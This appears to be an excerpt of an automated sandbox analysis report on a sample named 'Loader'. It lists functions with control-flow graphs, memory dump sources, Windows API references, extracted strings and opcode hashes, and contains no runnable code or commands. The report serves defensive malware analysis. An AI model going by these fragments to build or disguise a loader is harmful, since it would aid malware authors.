                                                                            control_flow_graph 1026 da08c0-da08e6 1027 da08eb-da08ff 1026->1027 1028 da0fba-da0ff4 1027->1028 1029 da0905 1027->1029 1030 da0cba-da0cc8 1029->1030 1031 da0c77-da0c89 1029->1031 1032 da0ae7-da0aee 1029->1032 1030->1027 1033 da0c8f-da0c9f 1031->1033 1034 da0ff5-da10e3 call da00e4 1031->1034 1032->1034 1036 da0af4-da0afe 1032->1036 1033->1027 1044 da10e8 1034->1044 1036->1034 1037 da0b04-da0b19 1036->1037 1037->1027 1046 da10ed-da1102 1044->1046 1047 da1108 1046->1047 1048 da120d-da1251 call da00f4 1046->1048 1047->1044 1047->1048 1049 da11ab-da11c2 call da1540 1047->1049 1050 da1178-da1188 1047->1050 1051 da11d8-da1208 1047->1051 1052 da110f-da1113 1047->1052 1053 da118d-da11a6 1047->1053 1054 da1123-da1131 1047->1054 1055 da1133-da113e 1047->1055 1056 da1140-da114e call da1299 1047->1056 1075 da1253 call da1b88 1048->1075 1076 da1253 call da20b8 1048->1076 1077 da1253 call da1fd4 1048->1077 1066 da11c8-da11d3 1049->1066 1050->1046 1051->1046 1058 da111c 1052->1058 1059 da1115-da111a 1052->1059 1053->1046 1054->1046 1055->1046 1068 da1154-da1173 1056->1068 1061 da1121 1058->1061 1059->1061 1061->1046 1066->1046 1068->1046 1072 da1259-da1262 1075->1072 1076->1072 1077->1072
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: oA8
                                                                            • API String ID: 0-2344185280
                                                                            • Opcode ID: 1ceeb715deda5775a336cb2e2a6b9aaa90a64cc3f19624a3670cba9778508a89
                                                                            • Instruction ID: 3a8e2bb77cf347ae8a60610660479132430ccdac2abf63e0ba3f1a1c6174dc4c
                                                                            • Opcode Fuzzy Hash: 1ceeb715deda5775a336cb2e2a6b9aaa90a64cc3f19624a3670cba9778508a89
                                                                            • Instruction Fuzzy Hash: 8CA1F534A04345CFC705CBA9C4945AABFB1FF87314F1485AAD586EB2A2CB74CD05CBA5
                                                                            Function 00DA2500 Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1078 da2500-da2502 1079 da2503-da2508 1078->1079 1080 da2770-da2777 1078->1080 1079->1080 1081 da25fa-da2600 1079->1081 1082 da275a-da275d 1079->1082 1083 da273e-da2744 1079->1083 1084 da265f-da266a 1079->1084 1085 da271c-da2722 1079->1085 1086 da259c-da259f 1079->1086 1087 da25b2-da25bd 1079->1087 1088 da25d1-da25dc 1079->1088 1089 da2571-da2582 1079->1089 1090 da2531-da2537 1079->1090 1091 da26b7-da26c0 1079->1091 1092 da2554-da256c 1079->1092 1093 da270a-da2717 1079->1093 1094 da24e8 1079->1094 1095 da266f-da2672 1079->1095 1096 da250f-da251a 1079->1096 1097 da25c2-da25cc 1079->1097 1098 da26e3-da26e9 1079->1098 1099 da2620-da2641 1079->1099 1100 da25e1-da25f5 1079->1100 1101 da2646-da264c 1079->1101 1102 da26a6-da26b2 1079->1102 1103 da2685-da268b 1079->1103 1105 da277a-da277f 1081->1105 1109 da2606-da261b 1081->1109 1107 da275f-da2764 1082->1107 1108 da2766 1082->1108 1083->1105 1106 da2746-da2755 1083->1106 1104 da24ed-da24ff 1084->1104 1085->1105 1121 da2724-da2739 1085->1121 1118 da25a8 1086->1118 1119 da25a1-da25a6 1086->1119 1087->1104 1088->1104 1089->1105 1116 da2588-da2597 1089->1116 1090->1105 1114 da253d-da2552 1090->1114 1091->1105 1117 da26c6-da26de 1091->1117 1092->1104 1093->1104 1094->1104 1112 da267b 1095->1112 1113 da2674-da2679 1095->1113 1133 da251c call da28d8 1096->1133 1134 da251c call da28c8 1096->1134 1097->1104 1098->1105 1120 da26ef-da2705 1098->1120 1099->1104 1100->1104 1110 da264e-da2653 1101->1110 1111 da2655 1101->1111 1102->1104 1103->1105 1115 da2691-da26a1 1103->1115 1104->1078 1106->1104 1123 da276b 1107->1123 1108->1123 1109->1104 1125 da265a 1110->1125 1111->1125 1126 da2680 1112->1126 1113->1126 1114->1104 1115->1104 1116->1104 1117->1104 1129 da25ad 1118->1129 1119->1129 1120->1104 1121->1104 1123->1104 1125->1104 1126->1104 1127 da2522-da252f 1127->1104 1129->1104 1133->1127 1134->1127
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: E5K[
                                                                            • API String ID: 0-1075465946
                                                                            • Opcode ID: 0169144e7df6fd6bf8f8667050fd0fbdb4d2c3e946e2494a2b88019e3e8cd4ac
                                                                            • Instruction ID: 536f3b06c44cb3ee6be4ca3a54c17019250fd82c5f71db57af4f7cd0681e9cb9
                                                                            • Opcode Fuzzy Hash: 0169144e7df6fd6bf8f8667050fd0fbdb4d2c3e946e2494a2b88019e3e8cd4ac
                                                                            • Instruction Fuzzy Hash: 63613531604602CFE318CF2EDAC0975B7B5FB5A710B628952D952CF6A0C774EE91CBA1
                                                                            Function 00DA4259 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1135 da4259-da4296 1137 da4299 1135->1137 1138 da429e-da42b3 1137->1138 1139 da42b9 1138->1139 1140 da4442-da4449 1138->1140 1139->1137 1139->1140 1141 da43be-da4413 1139->1141 1142 da434f-da4361 1139->1142 1143 da4330-da4334 1139->1143 1144 da42c0-da432b 1139->1144 1145 da4366-da43b9 1139->1145 1166 da4419-da4427 1141->1166 1142->1138 1146 da433d 1143->1146 1147 da4336-da433b 1143->1147 1144->1138 1145->1138 1150 da4342-da434a 1146->1150 1147->1150 1150->1138 1170 da4429-da442e 1166->1170 1171 da4430 1166->1171 1173 da4435-da443d 1170->1173 1171->1173 1173->1138
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: |]#
                                                                            • API String ID: 0-3199413927
                                                                            • Opcode ID: b8e24ebab26dcf6951226e86e8563ecfc4d353436d14c4fcfc2ca3e9dcb4a745
                                                                            • Instruction ID: e02ccde054da23ac068602dee7b7d8b22eeeed36f0d1c4478aa10fddd5ed4ce3
                                                                            • Opcode Fuzzy Hash: b8e24ebab26dcf6951226e86e8563ecfc4d353436d14c4fcfc2ca3e9dcb4a745
                                                                            • Instruction Fuzzy Hash: F441D534B043048FD7589B7D881576F7BB6AFCA300B24886AD946DB3A6DEB4DC0587A1
                                                                            Function 00DA100D Relevance: .2, Instructions: 194COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8c57367ccc0b1c46e469ac7c70403feaa12009a415833a097a51b20f4f6fc2e4
                                                                            • Instruction ID: 6246ad1eeb58737439b1f9f8dc40eef441167c72ccd5346c8a58109e90144be5
                                                                            • Opcode Fuzzy Hash: 8c57367ccc0b1c46e469ac7c70403feaa12009a415833a097a51b20f4f6fc2e4
                                                                            • Instruction Fuzzy Hash: EA61F734A04341CFC7458FA9C8902AABBB1FF87314F1485BED586DB2A1CB758D06CBA5
                                                                            Function 00DA6178 Relevance: .2, Instructions: 159COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 72d4998a3eb5b10454a5fd73f959db3f529acb4582c0dc596427b6c82fbdc452
                                                                            • Instruction ID: 72f3cab63a60c4d5d8bc84c3fda6509ff6667fe891d3664a3e0a8fe679b5b0fc
                                                                            • Opcode Fuzzy Hash: 72d4998a3eb5b10454a5fd73f959db3f529acb4582c0dc596427b6c82fbdc452
                                                                            • Instruction Fuzzy Hash: 5C512635B14215CFDB44CF78D89466EBBF6EBCA710F294466E506EB3A0CA70CD018BA1
                                                                            Function 00DA5990 Relevance: .1, Instructions: 142COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 73eb1470b6d6699052225da41bc3b976ad0098169cf117601cd46eb8195ccb09
                                                                            • Instruction ID: 74d870c6a8aebdfe05dc09d5442913ced6f3ddc63322d0f39a1b04d6636fbaaf
                                                                            • Opcode Fuzzy Hash: 73eb1470b6d6699052225da41bc3b976ad0098169cf117601cd46eb8195ccb09
                                                                            • Instruction Fuzzy Hash: 05515A31B05717CBDB049B74A98107FBBA5EB86710762492BD842DF39AC730DE059BB2
                                                                            Function 00DA59A0 Relevance: .1, Instructions: 142COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0d6961fa7f38a7e52021f3c482e0cba833a76076acba205445e31af8922e833e
                                                                            • Instruction ID: 1f7664d472cfd6c1ebcebf99716e75070663d46e49088640a01c1ffc1edf7195
                                                                            • Opcode Fuzzy Hash: 0d6961fa7f38a7e52021f3c482e0cba833a76076acba205445e31af8922e833e
                                                                            • Instruction Fuzzy Hash: 8F515C31B01717CB9B049B74A98103FBAA6EBC6710762453BD852DF399CB70DE019BB2
                                                                            Function 00DA10B8 Relevance: .1, Instructions: 128COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 41738533bcf32633abb7304e7a66682cee55a4be5a22f12cf960095019e94a06
                                                                            • Instruction ID: 538f0dfa67b023019e5545fdfee7d51fd39b77b62e73e3874043176bbd307c70
                                                                            • Opcode Fuzzy Hash: 41738533bcf32633abb7304e7a66682cee55a4be5a22f12cf960095019e94a06
                                                                            • Instruction Fuzzy Hash: 1841B575B002158FC7048FADC88567EBAB6FB89741F20802AE516EB3A1CA71CD01CBA5
                                                                            Function 00DA3BD2 Relevance: .1, Instructions: 126COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5072eb7527df9bedaa1090a6cfef3ad9a8fb7be5caef9914405ddfa065fb3234
                                                                            • Instruction ID: 7cc91139c528310c1045cc8a3c9da5a6f3293be0549906de310655ee36bbadfb
                                                                            • Opcode Fuzzy Hash: 5072eb7527df9bedaa1090a6cfef3ad9a8fb7be5caef9914405ddfa065fb3234
                                                                            • Instruction Fuzzy Hash: C851C170D14259CFCB05CBA8D9914AEFFB2FF96300B18889BE442AB152C374E945CB66
                                                                            Function 00DA1540 Relevance: .1, Instructions: 114COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a423064596fe7835abc1bbd14f412e8978285a1f299c202c3484345882266ebb
                                                                            • Instruction ID: 679c971b9d97b614c2b956f7cd873a43378d989a9a1d7c2ef77054579708b07e
                                                                            • Opcode Fuzzy Hash: a423064596fe7835abc1bbd14f412e8978285a1f299c202c3484345882266ebb
                                                                            • Instruction Fuzzy Hash: 8E419275E082548FCB04CFA9C8955BABBF6ABC9311F29806BD946E7391C630CD05CB61
                                                                            Function 6E4F7DB8 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • __RTC_Initialize.LIBCMT ref: 6E4F7DFF
                                                                            • ___scrt_uninitialize_crt.LIBCMT ref: 6E4F7E19
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: Initialize___scrt_uninitialize_crt
                                                                            • String ID:
                                                                            • API String ID: 2442719207-0
                                                                            • Opcode ID: 47e82f99f56970366693334b6da0a873986250bd99e261ad39dcde1469e8a2df
                                                                            • Instruction ID: 5976e0a41ab9ccf0fd09cf8868c17128f1ec16751dd733c8d33812434dd68fcc
                                                                            • Opcode Fuzzy Hash: 47e82f99f56970366693334b6da0a873986250bd99e261ad39dcde1469e8a2df
                                                                            • Instruction Fuzzy Hash: 9B419032928655EBDB118FF5C848EAE3B79EBC5F55F11491BE4145A280D7388D038BE0
                                                                            Function 6E4F7E68 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 866 6e4f7e68-6e4f7e79 call 6e4f8610 869 6e4f7e7b-6e4f7e81 866->869 870 6e4f7e8a-6e4f7e91 866->870 869->870 871 6e4f7e83-6e4f7e85 869->871 872 6e4f7e9d-6e4f7eb1 dllmain_raw 870->872 873 6e4f7e93-6e4f7e96 870->873 874 6e4f7f63-6e4f7f72 871->874 876 6e4f7f5a-6e4f7f61 872->876 877 6e4f7eb7-6e4f7ec8 dllmain_crt_dispatch 872->877 873->872 875 6e4f7e98-6e4f7e9b 873->875 878 6e4f7ece-6e4f7ee0 call 6e4f7650 875->878 876->874 877->876 877->878 881 6e4f7f09-6e4f7f0b 878->881 882 6e4f7ee2-6e4f7ee4 878->882 884 6e4f7f0d-6e4f7f10 881->884 885 6e4f7f12-6e4f7f23 dllmain_crt_dispatch 881->885 882->881 883 6e4f7ee6-6e4f7f04 call 6e4f7650 call 6e4f7db8 dllmain_raw 882->883 883->881 884->876 884->885 885->876 887 6e4f7f25-6e4f7f57 dllmain_raw 885->887 887->876
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                            • String ID:
                                                                            • API String ID: 3136044242-0
                                                                            • Opcode ID: 05f11ef93c9fd039308d4b627234ed690d73a6df0136c70e9dad1d59ae8fdef2
                                                                            • Instruction ID: d37a029516db5d3e69b50f05bb84a8702e06e540ba8993f9aed3160a3db8ffd7
                                                                            • Opcode Fuzzy Hash: 05f11ef93c9fd039308d4b627234ed690d73a6df0136c70e9dad1d59ae8fdef2
                                                                            • Instruction Fuzzy Hash: 22218272D28556EBDB618FB5C848EAE3A79EFC0F94B01441BF81856390D3398D038BE0
                                                                            Function 6E4F7CB1 Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • __RTC_Initialize.LIBCMT ref: 6E4F7CFE
                                                                              • Part of subcall function 6E4F817B: InitializeSListHead.KERNEL32(6E55D830,6E4F7D08,6E509450,00000010,6E4F7C99,?,?,?,6E4F7EC1,?,00000001,?,?,00000001,?,6E509498), ref: 6E4F8180
                                                                            • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E4F7D68
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                            • String ID:
                                                                            • API String ID: 3231365870-0
                                                                            • Opcode ID: ca67c0420b6bb73174968e9e754749be7abb93d0855e35df0b0e284d766be07b
                                                                            • Instruction ID: 2b1750d087e8c716e2a1f5227e8e88fc24f43a980b47df07ee0030c19e2f7e7b
                                                                            • Opcode Fuzzy Hash: ca67c0420b6bb73174968e9e754749be7abb93d0855e35df0b0e284d766be07b
                                                                            • Instruction Fuzzy Hash: EE21DE32558641DADF10ABF5C418FEE37A49FEAB6CF110A0FD4402E2C2CF255043C6A2
                                                                            Function 6E4FE300 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 935 6e4fe300-6e4fe305 936 6e4fe307-6e4fe31f 935->936 937 6e4fe32d-6e4fe336 936->937 938 6e4fe321-6e4fe325 936->938 940 6e4fe348 937->940 941 6e4fe338-6e4fe33b 937->941 938->937 939 6e4fe327-6e4fe32b 938->939 942 6e4fe3a2-6e4fe3a6 939->942 945 6e4fe34a-6e4fe357 GetStdHandle 940->945 943 6e4fe33d-6e4fe342 941->943 944 6e4fe344-6e4fe346 941->944 942->936 946 6e4fe3ac-6e4fe3af 942->946 943->945 944->945 947 6e4fe359-6e4fe35b 945->947 948 6e4fe384-6e4fe396 945->948 947->948 949 6e4fe35d-6e4fe366 GetFileType 947->949 948->942 950 6e4fe398-6e4fe39b 948->950 949->948 951 6e4fe368-6e4fe371 949->951 950->942 952 6e4fe379-6e4fe37c 951->952 953 6e4fe373-6e4fe377 951->953 952->942 954 6e4fe37e-6e4fe382 952->954 953->942 954->942
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 6E4FE34C
                                                                            • GetFileType.KERNELBASE(00000000), ref: 6E4FE35E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: FileHandleType
                                                                            • String ID:
                                                                            • API String ID: 3000768030-0
                                                                            • Opcode ID: d262288d967972e371e9dc5492f57f9a9f3f658adfb788d9b6563ddab112d090
                                                                            • Instruction ID: 834348ff1ca3a29fa50436edac4a1f676d44afb1072d8730eba8b15a0cd15e1d
                                                                            • Opcode Fuzzy Hash: d262288d967972e371e9dc5492f57f9a9f3f658adfb788d9b6563ddab112d090
                                                                            • Instruction Fuzzy Hash: 2511B472104742CAC7208ABE8CDCA127A95A7D7A36B39071FD1B6876F1CF70D5839652
                                                                            Function 00DA0824 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1008 da0824-da66ea 1011 da66ec-da66ef 1008->1011 1012 da66f2-da671d LoadLibraryW 1008->1012 1011->1012 1013 da671f-da6725 1012->1013 1014 da6726-da6743 1012->1014 1013->1014
                                                                            APIs
                                                                            • LoadLibraryW.KERNELBASE(00000000), ref: 00DA6710
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: c5ae69f608b3eb3c6dea5100d3a0b66ac736fcea94e5c5610f545ceb1b8f7e6c
                                                                            • Instruction ID: 2ec14fc30998a31c4a7212cf467a2ba30c0c1723c9729d0c514c43d3676bca9d
                                                                            • Opcode Fuzzy Hash: c5ae69f608b3eb3c6dea5100d3a0b66ac736fcea94e5c5610f545ceb1b8f7e6c
                                                                            • Instruction Fuzzy Hash: F22124B1C0065ADBCB10CF9AC544B9EFBF4FB48720F14816AE918A3340D7B4A900CFA5
                                                                            Function 00DA6698 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1017 da6698-da66ea 1020 da66ec-da66ef 1017->1020 1021 da66f2-da671d LoadLibraryW 1017->1021 1020->1021 1022 da671f-da6725 1021->1022 1023 da6726-da6743 1021->1023 1022->1023
                                                                            APIs
                                                                            • LoadLibraryW.KERNELBASE(00000000), ref: 00DA6710
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: fc9b655fcf8705545730f1409f903ae3977b6d628741b09a8f444e08676d1cd9
                                                                            • Instruction ID: 7d2f1339cab413078e0fd2a3ce82f3780d93ea088ebb782ea8290fbc7217e129
                                                                            • Opcode Fuzzy Hash: fc9b655fcf8705545730f1409f903ae3977b6d628741b09a8f444e08676d1cd9
                                                                            • Instruction Fuzzy Hash: 89112FB1C0065A9BDB10CFAAC844B9EFBF4BB48720F14816AE918A3340D774A900CFA1
                                                                            Function 00DA5424 Relevance: 1.3, APIs: 1, Instructions: 52COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1174 da5424-da6a9c CloseHandle 1177 da6a9e-da6aa4 1174->1177 1178 da6aa5-da6acd 1174->1178 1177->1178
                                                                            APIs
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 00DA6A8F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 30aa1e1a77f70a1ede85d3ad972759661dcd6d67bd4657c2b1606f43176dfb1b
                                                                            • Instruction ID: 7e3ca80ff30bc98c46cdc97ebe018ac423eab4caa4bc9798a4c336cae760c5b9
                                                                            • Opcode Fuzzy Hash: 30aa1e1a77f70a1ede85d3ad972759661dcd6d67bd4657c2b1606f43176dfb1b
                                                                            • Instruction Fuzzy Hash: B41116B1900749CFDB10DF9AC445BAEBBF4EF48320F248469D558A7340D778A944CBA5
                                                                            Function 00DA6A28 Relevance: 1.3, APIs: 1, Instructions: 51COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1181 da6a28-da6a9c CloseHandle 1183 da6a9e-da6aa4 1181->1183 1184 da6aa5-da6acd 1181->1184 1183->1184
                                                                            APIs
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 00DA6A8F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 51af26b15a84ed57b2eb05628c04eb35a23fece395728e547ef6f345d2c60906
                                                                            • Instruction ID: 1e7bc778187e02d7a599f2d855621afc6907b5cc9c97196eb526eb06a42ca21d
                                                                            • Opcode Fuzzy Hash: 51af26b15a84ed57b2eb05628c04eb35a23fece395728e547ef6f345d2c60906
                                                                            • Instruction Fuzzy Hash: 121128B6800249CFDB10DF99C5457DEBBF4EF88320F24841AD518A7750D778A944CFA5

                                                                            Non-executed Functions

                                                                            Function 6E529910 Relevance: 24.0, Strings: 18, Instructions: 1543COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $!by*$$$)*+$$123X$1X74$45$5670$;:54$=n=c$H$PQRS$Xqrs$\]^_$`abc$eyv$sDK}$vv@
                                                                            • API String ID: 0-744883782
                                                                            • Opcode ID: b717fa412420b32593f985657e3a8566e7a3a9fbde863e76e74dd9bba23145a6
                                                                            • Instruction ID: 21e3f0578135ec740aef7401ade4f9945b34ed28e1defd3c5d1cd4a537b73abb
                                                                            • Opcode Fuzzy Hash: b717fa412420b32593f985657e3a8566e7a3a9fbde863e76e74dd9bba23145a6
                                                                            • Instruction Fuzzy Hash: C4B2CE7150C3818FE765CF65C8907ABBBE2AFD6304F18892CE5D98B392E7748409CB52
                                                                            Function 6E543FA0 Relevance: 17.8, Strings: 14, Instructions: 304COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
